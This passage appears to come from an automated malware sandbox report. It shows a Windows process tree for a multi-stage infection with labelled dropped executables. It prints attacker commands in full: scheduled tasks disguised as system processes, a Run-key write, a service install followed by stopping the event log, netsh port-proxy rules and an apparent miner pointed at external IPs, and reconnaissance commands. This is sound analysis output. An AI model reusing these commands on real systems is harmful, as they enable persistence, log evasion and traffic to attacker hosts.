      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1120
        6⤵
        Program crash
        
        PID:2076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1136
        6⤵
        Program crash
        
        PID:4580
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1048
        6⤵
        Program crash
        
        PID:4356
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1068
        6⤵
        Program crash
        
        PID:116
- - C:\Users\Admin\AppData\Local\Temp\rty25.exe
    "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
    3⤵
    - Executes dropped EXE
    PID:5064
- C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe"
  2⤵
  - Executes dropped EXE
  PID:4444
- C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  - Executes dropped EXE
  PID:780
- - C:\Windows\System32\werfault.exe
    \??\C:\Windows\System32\werfault.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3980
- C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
  C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4464
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4392
- C:\Users\Admin\AppData\Local\Temp\Files\south.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\south.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1752
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup8.exe"
  2⤵
  - Executes dropped EXE
  PID:3064
- C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1436
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe" /rl HIGHEST /f
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:3028
- - C:\Windows\SysWOW64\SubDir\asg.exe
    "C:\Windows\SysWOW64\SubDir\asg.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    PID:2072
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:3836
- C:\Users\Admin\AppData\Local\Temp\Files\redline1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\redline1234.exe"
  2⤵
  - Executes dropped EXE
  PID:4852
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "ACULXOBT"
    3⤵
    - Launches sc.exe
    PID:2520
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4328
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ACULXOBT"
    3⤵
    - Launches sc.exe
    PID:3208
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4584
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  - Executes dropped EXE
  PID:1956
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_institute';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_institute' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_institute\Tests_for_preparation_for_the_institute.exe"' -PropertyType 'String'
    3⤵
    PID:4748
- C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2356
- - C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
    3⤵
    - Executes dropped EXE
    PID:2396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2192
      4⤵
      Program crash
      PID:3052
- C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1240
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
    3⤵
    - Executes dropped EXE
    PID:1388
- - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:852
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 1512
    3⤵
    - Program crash
    PID:4004
- C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3080
- C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
  2⤵
  - Sets file execution options in registry
  - Executes dropped EXE
  PID:680
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfyxb7xj.cmdline"
    3⤵
    PID:2892
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAED0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAECF.tmp"
      4⤵
      PID:4280
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 437
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:2336
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:2528
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:3540
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy reset
    3⤵
    PID:2620
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:1176
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1760
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
    3⤵
    PID:4128
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1464
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:4656
- - C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
    3⤵
    PID:1264
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1348
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:3540
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:3052
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:1932
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:3488
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
    3⤵
    PID:4880
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1272
- C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1230.exe"
  2⤵
  - Executes dropped EXE
  PID:4728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2336
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1360 -ip 1360
1⤵
PID:4268

C:\Windows\SysWOW64\chcp.com
chcp 1251
1⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1360 -ip 1360
1⤵
PID:4944

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
1⤵
- DcRat
- Creates scheduled task(s)
PID:452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1360 -ip 1360
1⤵
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1360 -ip 1360
1⤵
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1360 -ip 1360
1⤵
PID:3384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1360 -ip 1360
1⤵
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1360 -ip 1360
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1360 -ip 1360
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1360 -ip 1360
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1360 -ip 1360
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1360 -ip 1360
1⤵
PID:452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1360 -ip 1360
1⤵
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1360 -ip 1360
1⤵
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1360 -ip 1360
1⤵
PID:100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1360 -ip 1360
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1360 -ip 1360
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1360 -ip 1360
1⤵
PID:4020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1360 -ip 1360
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1360 -ip 1360
1⤵
PID:5012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Admin\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\odt\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "pixelcloudnew2p" /sc MINUTE /mo 13 /tr "'C:\odt\pixelcloudnew2.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "pixelcloudnew2" /sc ONLOGON /tr "'C:\odt\pixelcloudnew2.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "pixelcloudnew2p" /sc MINUTE /mo 12 /tr "'C:\odt\pixelcloudnew2.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winhostDhcp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 852 -ip 852
1⤵
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1336 -ip 1336
1⤵
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1336 -ip 1336
1⤵
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1336 -ip 1336
1⤵
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 1336
1⤵
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1336 -ip 1336
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1336 -ip 1336
1⤵
PID:3216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1336 -ip 1336
1⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 1336
1⤵
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1336 -ip 1336
1⤵
PID:3640

C:\Users\Admin\AppData\Local\Temp\DABB.exe
C:\Users\Admin\AppData\Local\Temp\DABB.exe
1⤵
- Executes dropped EXE
PID:3700
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 348
  2⤵
  - Program crash
  PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3700 -ip 3700
1⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\ED3A.exe
C:\Users\Admin\AppData\Local\Temp\ED3A.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2676
- C:\Users\Admin\AppData\Local\Temp\ED3A.exe
  C:\Users\Admin\AppData\Local\Temp\ED3A.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4732
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\66636179-2e9a-4a3b-b05e-f46de5886a87" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\ED3A.exe
    "C:\Users\Admin\AppData\Local\Temp\ED3A.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3364
  - - C:\Users\Admin\AppData\Local\Temp\ED3A.exe
      "C:\Users\Admin\AppData\Local\Temp\ED3A.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      PID:3756
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 568
        5⤵
        Program crash
        
        PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3756 -ip 3756
1⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\70D.exe
C:\Users\Admin\AppData\Local\Temp\70D.exe
1⤵
PID:2060
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3992
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3776

C:\Users\Admin\AppData\Local\Temp\D38.exe
C:\Users\Admin\AppData\Local\Temp\D38.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4344
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2984
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Checks processor information in registry
  PID:2060

C:\Users\Admin\AppData\Local\Temp\1F5A.exe
C:\Users\Admin\AppData\Local\Temp\1F5A.exe
1⤵
PID:2076
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
1⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2080 -ip 2080
1⤵
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2080 -ip 2080
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2080 -ip 2080
1⤵
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
1⤵
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2080 -ip 2080
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
1⤵
PID:3384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2080 -ip 2080
1⤵
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2080 -ip 2080
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
1⤵
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
1⤵
PID:1688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2080 -ip 2080
1⤵
PID:732

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3344

C:\Users\Admin\AppData\Local\Temp\9602.exe
C:\Users\Admin\AppData\Local\Temp\9602.exe
1⤵
PID:4020
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 1016
  2⤵
  - Program crash
  PID:1240

C:\Users\Admin\AppData\Local\Temp\9B71.exe
C:\Users\Admin\AppData\Local\Temp\9B71.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4020 -ip 4020
1⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\B4.exe
C:\Users\Admin\AppData\Local\Temp\B4.exe
1⤵
- Executes dropped EXE
PID:3064
- C:\Users\Admin\AppData\Local\Temp\onefile_3064_133510487509323473\stub.exe
  C:\Users\Admin\AppData\Local\Temp\B4.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2700
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      PID:4020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:2416
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:184

C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1464
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1240 -ip 1240
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2396 -ip 2396
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
1⤵
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2080 -ip 2080
1⤵
PID:2312

C:\Users\Admin\AppData\Roaming\hwhgjba
C:\Users\Admin\AppData\Roaming\hwhgjba
1⤵
PID:5072

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2080 -ip 2080
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2080 -ip 2080
1⤵
PID:3688

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
